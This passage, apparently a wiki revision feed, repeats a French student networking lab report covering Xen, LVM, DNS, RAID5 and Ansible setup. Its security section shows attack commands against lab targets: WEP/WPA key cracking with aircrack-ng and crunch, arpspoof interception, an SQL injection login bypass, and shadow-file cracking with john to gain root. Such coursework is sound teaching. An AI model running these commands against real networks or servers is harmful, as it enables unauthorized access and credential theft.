 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
  217.70.177.40/32;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Afin d'autoriser le transfert des informations au DNS secondaire 217.70.177.40.&lt;br /&gt;
&lt;br /&gt;
On test alors la configuration :&lt;br /&gt;
 # host -t any stropharia.site ns6.gandi.net&lt;br /&gt;
 Using domain server:&lt;br /&gt;
 Name: ns6.gandi.net&lt;br /&gt;
 Address: 2001:4b98:d:1::40#53&lt;br /&gt;
 Aliases:&lt;br /&gt;
 stropharia.site mail is handled by 42 &lt;br /&gt;
 ns1.stropharia.site.&lt;br /&gt;
 stropharia.site name server ns1.stropharia.site.&lt;br /&gt;
 stropharia.site name server ns6.gandi.net.&lt;br /&gt;
 stropharia.site has SOA record ns1.stropharia.site. &lt;br /&gt;
 root.stropharia.site. 13 3600 600 86400 600&lt;br /&gt;
&lt;br /&gt;
On conclue que le DNS est fonctionne correctement.&lt;br /&gt;
&lt;br /&gt;
=5.1=&lt;br /&gt;
=5.2  Cassage de clef WEP d’un point d’accès WiFi=&lt;br /&gt;
&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On lance un scran des réseaux wifi'''&lt;br /&gt;
 airmon-ng --encrypt wep wlan0mon&lt;br /&gt;
'''On capture les paquets'''&lt;br /&gt;
 airdump-ng --write crack11 --channel 3 --bssid 04:DA:D2:9C:50:5A wlan0mon&lt;br /&gt;
'''On lance le crack de la clé'''&lt;br /&gt;
 aircrack-ng -z crack11-01.cap&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [F1:DE:D4:00:00:00:00:0F:FF:FF:FF:FF:FF ]&lt;br /&gt;
=5.3=&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On regarde les réseaux pour avoir le BSSID'''&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
'''On lance la commande capture sur le channel 5 et on attend le handshake'''&lt;br /&gt;
 airodump-ng --write donnees -c 5 --bssid 00:14:1B:60:8C:2A&lt;br /&gt;
'''Pendant ce temps-là, nous créons le dictionnaire pour le brutforce'''&lt;br /&gt;
 crunch 8 8 0123456789 &amp;gt; dictionnaire.txt&lt;br /&gt;
'''Pour gagner du temps, nous divisions ce dictionnaire en 4 parties'''&lt;br /&gt;
 split -l 25000000 dictionnaire.txt dictionnairediv.txt&lt;br /&gt;
&lt;br /&gt;
'''On lance le brutforce sur plusieurs machine'''&lt;br /&gt;
 aircrack-ng -a2 -b 00:14:1B:60:8C:2A -w dictionnairediv#.txt donnees-01.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:crackwpagrp11.jpg|600px]]&lt;br /&gt;
&lt;br /&gt;
=5.4 Attaque &amp;quot;homme au milieu&amp;quot;=&lt;br /&gt;
&lt;br /&gt;
Commande afin de voir les paquets entre la machine et le routeur&lt;br /&gt;
 arpspoof -i eth0 -t 172.26.145.57 172.26.145.254 &lt;br /&gt;
&lt;br /&gt;
Ensuite, on peut visualiser les paquets reçu avec wireshark.&lt;br /&gt;
&lt;br /&gt;
=5.5  Intrusion sur un serveur d’application Web=&lt;br /&gt;
&lt;br /&gt;
Sur site honey.plil.info, on exploite la faille avec une injection SQL dans l'id et le mdp:&lt;br /&gt;
 ' OR 1 = 1 --&lt;br /&gt;
&lt;br /&gt;
On constate qu'il y a un service SSH et un serveur apache avec la commande suivante:&lt;br /&gt;
 nmap -T4 -A honey.plil.info&lt;br /&gt;
&lt;br /&gt;
Avec l'utilisation des manuels on extrait le fichier de configuration phpmyadmin afin d'avoir les identifiants pour se connecter honey.plil.fr/phpmyadmin. Il est important de se connecter en root avec le même mdp.&lt;br /&gt;
&lt;br /&gt;
Dans la BDD, on retrouve un compte d'un utilisateur ayant les droits sur la machine. On se connecte donc en SSH avec son compte et on extrait les fichier password et shadow.&lt;br /&gt;
&lt;br /&gt;
Nous allons donc utiliser john pour trouver le mdp root. De plus, nous créons notre dictionnaire avec crunch et sed en utilisant l'indice du sujet.&lt;br /&gt;
&lt;br /&gt;
Je lance donc la commande suivante:&lt;br /&gt;
 john --wordlist=dictionnaire password.txt unshadow.txt &amp;gt; output.txt&lt;br /&gt;
&lt;br /&gt;
Mdp trouvé et connexion en root(Groupe11):&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Honeygroupe11.png]]&lt;br /&gt;
&lt;br /&gt;
=6.1 Installation Raid5=&lt;br /&gt;
&lt;br /&gt;
Création des partitions sur capbreton&lt;br /&gt;
 lvcreate -LG -n stropharia-part1 virtual&lt;br /&gt;
 lvcreate -LG -n stropharia-part2 virtual&lt;br /&gt;
 lvcreate -LG -n stropharia-part3 virtual&lt;br /&gt;
&lt;br /&gt;
Modification du fichier stropharia.cfg&lt;br /&gt;
 'phy:/dev/virtual/stropharia-part1,xvda5,w'&lt;br /&gt;
 'phy:/dev/virtual/stropharia-part2,xvda6,w'&lt;br /&gt;
 'phy:/dev/virtual/stropharia-part3,xvda7,w'&lt;br /&gt;
&lt;br /&gt;
On recrée notre VM&lt;br /&gt;
 xl destroy stropharia&lt;br /&gt;
 xl create -c /etc/xen/stropharia.cfg&lt;br /&gt;
&lt;br /&gt;
Création des volumes et formatage&lt;br /&gt;
 mdadm --create --verbose /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7&lt;br /&gt;
 mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
 mkds -t ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
Mount des partitions&lt;br /&gt;
 mount /dev/md0 /mnt&lt;br /&gt;
&lt;br /&gt;
Nous pouvons donc maintenant perdre un disque en gardant les données de la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
=7.1 Architecture de la ferme= &lt;br /&gt;
&lt;br /&gt;
Création d'un bridge dans les paramètres de la machine virtuelle stropharia.&lt;br /&gt;
&lt;br /&gt;
Ajout d'une interface dans les 2 VM en modifiant /etc/network/interfaces.&lt;br /&gt;
&lt;br /&gt;
Ajout de la mascarade&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.42.25 &lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.42.25 &lt;br /&gt;
 iptables -t nat -A POSTROUTING -j SNAT -s 192.168.42.25  --to 193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Création de la clef publique et commande pour la transmettre aux VM.&lt;br /&gt;
&lt;br /&gt;
 cat ~/.ssh/id_rsa.pub | ssh username@remote_host &amp;quot;mkdir -p ~/.ssh &amp;amp;&amp;amp; cat &amp;gt;&amp;gt; ~/.ssh/authorized_keys&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Rôle motd (adriagalin.motd)&lt;br /&gt;
 ansible-galaxy install adriagalin.motd&lt;br /&gt;
&lt;br /&gt;
=7.2 Installation de docker= &lt;br /&gt;
Installation du rôle geerlingguy.docker&lt;br /&gt;
 ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Pour adapter le rôle à debian buster, il faut modifier les variables suivantes dans le playbook:&lt;br /&gt;
 docker_apt_gpg_key: https://download.docker.com/linux/debian/gpg&lt;br /&gt;
 docker_apt_repository: deb [arch=amd64] https://download.docker.com/linux/debian buster stable&lt;br /&gt;
&lt;br /&gt;
On peut donc lancer l'installation (uniquement sur stropharia)&lt;br /&gt;
 ansible-playbook dockerplaybook&lt;/div&gt;</summary>
		<author><name>Ccalleri</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=55154</id>
		<title>TP sysres IMA5sc 2020/2021 G11</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=55154"/>
				<updated>2020-12-21T23:20:37Z</updated>
		
		<summary type="html">&lt;p&gt;Ccalleri : /* 4.2 Serveur DNS */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Sébastien DARDENNE - Corto CALLERISA&lt;br /&gt;
&lt;br /&gt;
=Adressage=&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! IP (privée) !! IP (publique) !! VLAN !! IPV4 !! IPV4 6509-E !! IPV4 C9200 !! IPV4 Routeur !! IPV6&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 11&lt;br /&gt;
| stropharia.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 100.64.0.18&lt;br /&gt;
| 193.48.57.178&lt;br /&gt;
| 311&lt;br /&gt;
| 10.60.111.0/24&lt;br /&gt;
| 10.60.111.1&lt;br /&gt;
| 10.60.111.2&lt;br /&gt;
| 10.60.111.254&lt;br /&gt;
| 2001:660:4401:60bd::0/64&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Mise en place de la machine virtuelle Xen=&lt;br /&gt;
==Creation de la VM==&lt;br /&gt;
&lt;br /&gt;
Après nous être connecté sur le serveur capbreton.plil.fr, nous créons la machine virtuelle du TP avec la commande :&lt;br /&gt;
 root@capbreton:~# xen-create-image --hostname=stropharia --password=****** --ip=100.64.0.18 --gateway=100.64.0.5 --netmask=255.255.255.0 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Cette commande spécifie les information de connexion à la VM ainsi que des informations réseau et la dernière version de Debian : Buster&lt;br /&gt;
&lt;br /&gt;
=Configuration OSPF sur 9200=&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                                  &lt;br /&gt;
 router-id 10.60.0.2                                  &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                                    &lt;br /&gt;
 summary-address 100.60.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                                  &lt;br /&gt;
 redistribute connected subnets                        &lt;br /&gt;
 redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
==Configuration LVM==&lt;br /&gt;
&lt;br /&gt;
Les disques de capbreton ont été initialisé pour l'utilisation avec LVM :&lt;br /&gt;
&lt;br /&gt;
 pvcreate /dev/sde&lt;br /&gt;
 pvcreate /dev/sdf&lt;br /&gt;
&lt;br /&gt;
Ces disques sont ensuite rassemblés dans le volume groupe storage :&lt;br /&gt;
 vgcreate storage /dev/sde /dev/sdf&lt;br /&gt;
&lt;br /&gt;
On obtient bien un groupe de 5.46 Tb :&lt;br /&gt;
 root@capbreton:~# vgdisplay storage&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  59&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                38&lt;br /&gt;
  Open LV               37&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       69632 / 272.00 GiB&lt;br /&gt;
  Free  PE / Size       1360894 / 5.19 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
On crée alors deux volumes logiques de 10 Go qui nous servirons de /var et /home :&lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n stropharia-home storage&lt;br /&gt;
 lvcreate -L10G -n stropharia-var storage&lt;br /&gt;
&lt;br /&gt;
Voici le résultat :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# lvdisplay | grep &amp;quot;stropharia&amp;quot; -A 15&lt;br /&gt;
  LV Path                /dev/storage/stropharia-home&lt;br /&gt;
  LV Name                stropharia-home&lt;br /&gt;
  VG Name                storage&lt;br /&gt;
  LV UUID                ofMU3m-QoN1-pZcA-32Dp-HJBN-ZNAn-O3awlc&lt;br /&gt;
  LV Write Access        read/write&lt;br /&gt;
  LV Creation host, time capbreton, 2020-10-12 17:40:11 +0200&lt;br /&gt;
  LV Status              available&lt;br /&gt;
  # open                 1&lt;br /&gt;
  LV Size                10.00 GiB&lt;br /&gt;
  Current LE             2560&lt;br /&gt;
  Segments               1&lt;br /&gt;
  Allocation             inherit&lt;br /&gt;
  Read ahead sectors     auto&lt;br /&gt;
  - currently set to     256&lt;br /&gt;
  Block device           254:18&lt;br /&gt;
   &lt;br /&gt;
  --- Logical volume ---&lt;br /&gt;
  LV Path                /dev/storage/stropharia-var&lt;br /&gt;
  LV Name                stropharia-var&lt;br /&gt;
  VG Name                storage&lt;br /&gt;
  LV UUID                8YAGLs-wD0c-6pSF-VEmC-wUfT-e9SI-8X9nFn&lt;br /&gt;
  LV Write Access        read/write&lt;br /&gt;
  LV Creation host, time capbreton, 2020-10-12 17:40:15 +0200&lt;br /&gt;
  LV Status              available&lt;br /&gt;
  # open                 1&lt;br /&gt;
  LV Size                10.00 GiB&lt;br /&gt;
  Current LE             2560&lt;br /&gt;
  Segments               1&lt;br /&gt;
  Allocation             inherit&lt;br /&gt;
  Read ahead sectors     auto&lt;br /&gt;
  - currently set to     256&lt;br /&gt;
  Block device           254:19&lt;br /&gt;
&lt;br /&gt;
==Mise en place des partitions==&lt;br /&gt;
On formate nos partitions au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/stropharia-home&lt;br /&gt;
 mkfs.ext4 /dev/storage/stropharia-var&lt;br /&gt;
&lt;br /&gt;
On note ces modifications dans /etc/xen/stropharia.cfg&lt;br /&gt;
&lt;br /&gt;
 disk       = [&lt;br /&gt;
              'file:/usr/local/xen/domains/trompettedelamort/disk.img,xvda2,w',&lt;br /&gt;
              'file:/usr/local/xen/domains/trompettedelamort/swap.img,xvda1,w',&lt;br /&gt;
              'phy:/dev/storage/trompettedelamort1,xvda3,w',&lt;br /&gt;
              'phy:/dev/storage/trompettedelamort2,xvda4,w'&lt;br /&gt;
            ]&lt;br /&gt;
&lt;br /&gt;
On lance maintenant la VM et l'on s'y connecte :&lt;br /&gt;
 xl create -c /etc/xen/stropharia.cfg&lt;br /&gt;
 xl console stropharia&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Après avoir monté et peuplé les partitions, on ajoute dans /etc/fstab&lt;br /&gt;
 /dev/xvda3 /home /ext4 default 0 2&lt;br /&gt;
 /dev/xvda4 /var /ext4 default 0 2&lt;br /&gt;
pour que le montage des partitions soit fait automatiquement à chaque démarrage.&lt;br /&gt;
&lt;br /&gt;
=4.1 Serveur SSH=&lt;br /&gt;
&lt;br /&gt;
Afin de rendre accessible notre VM par SSH, nous décommentons la ligne&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
du fichier sshd-config. On restart ensuite le service pour prendre en comte la modification avec la commande&lt;br /&gt;
 sytemctl restart sshd&lt;br /&gt;
On test la connection :&lt;br /&gt;
 $ ssh root@ns1.stropharia.site&lt;br /&gt;
 root@ns1.stropharia.site's password:&lt;br /&gt;
La connection ssh fonctionne donc.&lt;br /&gt;
Update : On peut aussi se connecter en avec&lt;br /&gt;
 ssh root@www.stropharia.site&lt;br /&gt;
&lt;br /&gt;
=4.2 Serveur DNS=&lt;br /&gt;
Nous allons utiliser l'implementation open-source de DNS bind pour créer une association entre notre nom de domaine et l'ip de notre VM. &lt;br /&gt;
&lt;br /&gt;
On commence par créer le fichier /etc/bind/db.stropharia.site&lt;br /&gt;
 $include /etc/bind/stropharia.site.dnssec/stropharia.site-ksk.key&lt;br /&gt;
 $include /etc/bind/stropharia.site.dnssec/stropharia.site-zsk.key&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.stropharia.site. root.stropharia.site. (&lt;br /&gt;
                              13         ; Serial&lt;br /&gt;
                            3600         ; Refresh [1h]&lt;br /&gt;
                             600         ; Retry [10mn]&lt;br /&gt;
                           86400         ; Expire [1d]&lt;br /&gt;
                             600 )       ; Negative Cache TTL [1h]&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.stropharia.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      MX      42 ns1&lt;br /&gt;
 ns1     IN      A       193.48.57.178&lt;br /&gt;
 www     IN      A       193.48.57.178&lt;br /&gt;
 ns1     IN      AAAA    2001:660:4401:60b2:216:3eff:fefb:8339&lt;br /&gt;
 www     IN      AAAA    2001:660:4401:60b2:216:3eff:fefb:8339&lt;br /&gt;
&lt;br /&gt;
Les parties mail et ipv6 font partie de la suite du TP, mais on peut voir les différents TTL pour le SOA (Start of Authority) ainsi que notre notre serveur de nom et l'adresse de l'hote.&lt;br /&gt;
&lt;br /&gt;
Afin d'avoir une trace personnelle, un record dans le fichier de zone à la forme suivante :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Format: !! host label!! ttl !! record class !! record type !! record data&lt;br /&gt;
|-&lt;br /&gt;
| Example:&lt;br /&gt;
| example.com&lt;br /&gt;
| 60&lt;br /&gt;
| IN&lt;br /&gt;
| A&lt;br /&gt;
| 104.255.228.125&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Et les différentes record types sont :&lt;br /&gt;
* A (Host address)&lt;br /&gt;
* AAAA (IPv6 host address)&lt;br /&gt;
* ALIAS (Auto resolved alias)&lt;br /&gt;
* CNAME (Canonical name for an alias)&lt;br /&gt;
* MX (Mail eXchange)&lt;br /&gt;
* NS (Name Server)&lt;br /&gt;
* PTR (Pointer)&lt;br /&gt;
* SOA (Start Of Authority)&lt;br /&gt;
* SRV (location of service)&lt;br /&gt;
* TXT (Descriptive text)&lt;br /&gt;
&lt;br /&gt;
On ajoute maintenant la zone dans le fichier /etc/bind/named.conf.local :&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;stropharia.site&amp;quot; IN {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.stropharia.site.signed&amp;quot;;&lt;br /&gt;
         allow-transfer {217.70.177.40;};&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
(On utilise le fichier signé pour sécuriser l'accès https, fait par la suite)&lt;br /&gt;
&lt;br /&gt;
On modifie également le fichier named.conf.options :&lt;br /&gt;
 options {&lt;br /&gt;
         directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
         dnssec-validation auto;&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
         dnssec-enable yes;&lt;br /&gt;
 };&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
  217.70.177.40/32;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Afin d'autoriser le transfert des informations au DNS secondaire 217.70.177.40&lt;br /&gt;
&lt;br /&gt;
=5.1=&lt;br /&gt;
=5.2  Cassage de clef WEP d’un point d’accès WiFi=&lt;br /&gt;
&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On lance un scran des réseaux wifi'''&lt;br /&gt;
 airmon-ng --encrypt wep wlan0mon&lt;br /&gt;
'''On capture les paquets'''&lt;br /&gt;
 airdump-ng --write crack11 --channel 3 --bssid 04:DA:D2:9C:50:5A wlan0mon&lt;br /&gt;
'''On lance le crack de la clé'''&lt;br /&gt;
 aircrack-ng -z crack11-01.cap&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [F1:DE:D4:00:00:00:00:0F:FF:FF:FF:FF:FF ]&lt;br /&gt;
=5.3=&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On regarde les réseaux pour avoir le BSSID'''&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
'''On lance la commande capture sur le channel 5 et on attend le handshake'''&lt;br /&gt;
 airodump-ng --write donnees -c 5 --bssid 00:14:1B:60:8C:2A&lt;br /&gt;
'''Pendant ce temps-là, nous créons le dictionnaire pour le brutforce'''&lt;br /&gt;
 crunch 8 8 0123456789 &amp;gt; dictionnaire.txt&lt;br /&gt;
'''Pour gagner du temps, nous divisions ce dictionnaire en 4 parties'''&lt;br /&gt;
 split -l 25000000 dictionnaire.txt dictionnairediv.txt&lt;br /&gt;
&lt;br /&gt;
'''On lance le brutforce sur plusieurs machine'''&lt;br /&gt;
 aircrack-ng -a2 -b 00:14:1B:60:8C:2A -w dictionnairediv#.txt donnees-01.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:crackwpagrp11.jpg|600px]]&lt;br /&gt;
&lt;br /&gt;
=5.4 Attaque &amp;quot;homme au milieu&amp;quot;=&lt;br /&gt;
&lt;br /&gt;
Commande afin de voir les paquets entre la machine et le routeur&lt;br /&gt;
 arpspoof -i eth0 -t 172.26.145.57 172.26.145.254 &lt;br /&gt;
&lt;br /&gt;
Ensuite, on peut visualiser les paquets reçu avec wireshark.&lt;br /&gt;
&lt;br /&gt;
=5.5  Intrusion sur un serveur d’application Web=&lt;br /&gt;
&lt;br /&gt;
Sur site honey.plil.info, on exploite la faille avec une injection SQL dans l'id et le mdp:&lt;br /&gt;
 ' OR 1 = 1 --&lt;br /&gt;
&lt;br /&gt;
On constate qu'il y a un service SSH et un serveur apache avec la commande suivante:&lt;br /&gt;
 nmap -T4 -A honey.plil.info&lt;br /&gt;
&lt;br /&gt;
Avec l'utilisation des manuels on extrait le fichier de configuration phpmyadmin afin d'avoir les identifiants pour se connecter honey.plil.fr/phpmyadmin. Il est important de se connecter en root avec le même mdp.&lt;br /&gt;
&lt;br /&gt;
Dans la BDD, on retrouve un compte d'un utilisateur ayant les droits sur la machine. On se connecte donc en SSH avec son compte et on extrait les fichier password et shadow.&lt;br /&gt;
&lt;br /&gt;
Nous allons donc utiliser john pour trouver le mdp root. De plus, nous créons notre dictionnaire avec crunch et sed en utilisant l'indice du sujet.&lt;br /&gt;
&lt;br /&gt;
Je lance donc la commande suivante:&lt;br /&gt;
 john --wordlist=dictionnaire password.txt unshadow.txt &amp;gt; output.txt&lt;br /&gt;
&lt;br /&gt;
Mdp trouvé et connexion en root(Groupe11):&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Honeygroupe11.png]]&lt;br /&gt;
&lt;br /&gt;
=6.1 Installation Raid5=&lt;br /&gt;
&lt;br /&gt;
Création des partitions sur capbreton&lt;br /&gt;
 lvcreate -LG -n stropharia-part1 virtual&lt;br /&gt;
 lvcreate -LG -n stropharia-part2 virtual&lt;br /&gt;
 lvcreate -LG -n stropharia-part3 virtual&lt;br /&gt;
&lt;br /&gt;
Modification du fichier stropharia.cfg&lt;br /&gt;
 'phy:/dev/virtual/stropharia-part1,xvda5,w'&lt;br /&gt;
 'phy:/dev/virtual/stropharia-part2,xvda6,w'&lt;br /&gt;
 'phy:/dev/virtual/stropharia-part3,xvda7,w'&lt;br /&gt;
&lt;br /&gt;
On recrée notre VM&lt;br /&gt;
 xl destroy stropharia&lt;br /&gt;
 xl create -c /etc/xen/stropharia.cfg&lt;br /&gt;
&lt;br /&gt;
Création des volumes et formatage&lt;br /&gt;
 mdadm --create --verbose /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7&lt;br /&gt;
 mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
 mkds -t ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
Mount des partitions&lt;br /&gt;
 mount /dev/md0 /mnt&lt;br /&gt;
&lt;br /&gt;
Nous pouvons donc maintenant perdre un disque en gardant les données de la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
=7.1 Architecture de la ferme= &lt;br /&gt;
&lt;br /&gt;
Création d'un bridge dans les paramètres de la machine virtuelle stropharia.&lt;br /&gt;
&lt;br /&gt;
Ajout d'une interface dans les 2 VM en modifiant /etc/network/interfaces.&lt;br /&gt;
&lt;br /&gt;
Ajout de la mascarade&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.42.25 &lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.42.25 &lt;br /&gt;
 iptables -t nat -A POSTROUTING -j SNAT -s 192.168.42.25  --to 193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Création de la clef publique et commande pour la transmettre aux VM.&lt;br /&gt;
&lt;br /&gt;
 cat ~/.ssh/id_rsa.pub | ssh username@remote_host &amp;quot;mkdir -p ~/.ssh &amp;amp;&amp;amp; cat &amp;gt;&amp;gt; ~/.ssh/authorized_keys&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Rôle motd (adriagalin.motd)&lt;br /&gt;
 ansible-galaxy install adriagalin.motd&lt;br /&gt;
&lt;br /&gt;
=7.2 Installation de docker= &lt;br /&gt;
Installation du rôle geerlingguy.docker&lt;br /&gt;
 ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Pour adapter le rôle à debian buster, il faut modifier les variables suivantes dans le playbook:&lt;br /&gt;
 docker_apt_gpg_key: https://download.docker.com/linux/debian/gpg&lt;br /&gt;
 docker_apt_repository: deb [arch=amd64] https://download.docker.com/linux/debian buster stable&lt;br /&gt;
&lt;br /&gt;
On peut donc lancer l'installation (uniquement sur stropharia)&lt;br /&gt;
 ansible-playbook dockerplaybook&lt;/div&gt;</summary>
		<author><name>Ccalleri</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=55153</id>
		<title>TP sysres IMA5sc 2020/2021 G11</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=55153"/>
				<updated>2020-12-21T23:18:12Z</updated>
		
		<summary type="html">&lt;p&gt;Ccalleri : /* 4.2 Serveur DNS */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Sébastien DARDENNE - Corto CALLERISA&lt;br /&gt;
&lt;br /&gt;
=Adressage=&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! IP (privée) !! IP (publique) !! VLAN !! IPV4 !! IPV4 6509-E !! IPV4 C9200 !! IPV4 Routeur !! IPV6&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 11&lt;br /&gt;
| stropharia.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 100.64.0.18&lt;br /&gt;
| 193.48.57.178&lt;br /&gt;
| 311&lt;br /&gt;
| 10.60.111.0/24&lt;br /&gt;
| 10.60.111.1&lt;br /&gt;
| 10.60.111.2&lt;br /&gt;
| 10.60.111.254&lt;br /&gt;
| 2001:660:4401:60bd::0/64&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Mise en place de la machine virtuelle Xen=&lt;br /&gt;
==Creation de la VM==&lt;br /&gt;
&lt;br /&gt;
Après nous être connecté sur le serveur capbreton.plil.fr, nous créons la machine virtuelle du TP avec la commande :&lt;br /&gt;
 root@capbreton:~# xen-create-image --hostname=stropharia --password=****** --ip=100.64.0.18 --gateway=100.64.0.5 --netmask=255.255.255.0 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Cette commande spécifie les information de connexion à la VM ainsi que des informations réseau et la dernière version de Debian : Buster&lt;br /&gt;
&lt;br /&gt;
=Configuration OSPF sur 9200=&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                                  &lt;br /&gt;
 router-id 10.60.0.2                                  &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                                    &lt;br /&gt;
 summary-address 100.60.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                                  &lt;br /&gt;
 redistribute connected subnets                        &lt;br /&gt;
 redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
==Configuration LVM==&lt;br /&gt;
&lt;br /&gt;
Les disques de capbreton ont été initialisé pour l'utilisation avec LVM :&lt;br /&gt;
&lt;br /&gt;
 pvcreate /dev/sde&lt;br /&gt;
 pvcreate /dev/sdf&lt;br /&gt;
&lt;br /&gt;
Ces disques sont ensuite rassemblés dans le volume groupe storage :&lt;br /&gt;
 vgcreate storage /dev/sde /dev/sdf&lt;br /&gt;
&lt;br /&gt;
On obtient bien un groupe de 5.46 Tb :&lt;br /&gt;
 root@capbreton:~# vgdisplay storage&lt;br /&gt;
